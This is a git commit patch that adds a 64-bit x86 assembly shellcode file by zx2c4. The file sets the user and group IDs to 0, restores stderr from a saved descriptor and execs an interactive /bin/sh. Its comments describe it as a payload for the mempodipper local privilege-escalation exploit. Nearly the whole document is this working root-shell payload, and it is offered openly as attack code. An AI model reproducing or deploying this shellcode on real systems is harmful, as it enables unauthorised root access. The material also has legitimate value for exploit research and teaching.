From df106c579d69056f4bcef612f324d4ef0d71fb05 Mon Sep 17 00:00:00 2001
From: "Jason A. Donenfeld" <Jason@zx2c4.com>
Date: Sun, 22 Jan 2012 04:37:23 +0100
Subject: Add custom 64bit shellcode and preserve stderr.

---
 shellcode-64.s | 49 +++++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 49 insertions(+)
 create mode 100644 shellcode-64.s

(limited to 'shellcode-64.s')

diff --git a/shellcode-64.s b/shellcode-64.s
new file mode 100644
index 0000000..2514ed2
--- /dev/null
+++ b/shellcode-64.s
@@ -0,0 +1,49 @@
+BITS 64
+; This shell code sets uid and gid to 0 and execs a shell in interactive mode.
+; It also reopens stderr that was previously saved inside fd 6, for use with mempodipper.
+;
+; by zx2c4
+
+
+;setuid(0)
+xor rdi,rdi
+mov al,0x69
+syscall
+;setgid(0)
+xor rdi,rdi
+mov al,0x6a
+syscall
+;dup2(6, 2)
+mov dil,0x6
+mov sil,0x2
+mov al,0x21
+syscall
+
+; execve("//bin/sh", ["//bin/sh", "-i", 0], 0)
+mov qword rbx,'//bin/sh'	; rbx = //bin/sh
+shr rbx,0x8			; remove leading / from rbx
+push rbx			; push rbx to stack
+mov rdi,rsp			; set rdi (arg 1) to top of stack
+
+xor rbx,rbx
+mov bx,'-i'			; rbx = '-i'
+push rbx			; push rbx to stack
+mov rcx,rsp			; set rcx to top of stack
+
+xor rax,rax			; rax = 0
+
+; so at this point:
+;	rdi is a pointer to '/bin/sh'
+;	rcx is a pointer to '-i'
+;	rax is null
+; since they are all the same size, we'll push them on the stack
+; and then it will be an array:
+push rax			; push rax to stack
+push rcx			; push rcx to stack
+push rdi			; push rdi to stack
+mov rsi,rsp			; set rsi (arg 2) to top of stack
+
+xor rdx,rdx			; rdx (arg 3) = 0
+
+mov al,0x3b			; al = 0x3b, which is the exec call
+syscall
-- 
cgit v1.2.3-59-g8ed1b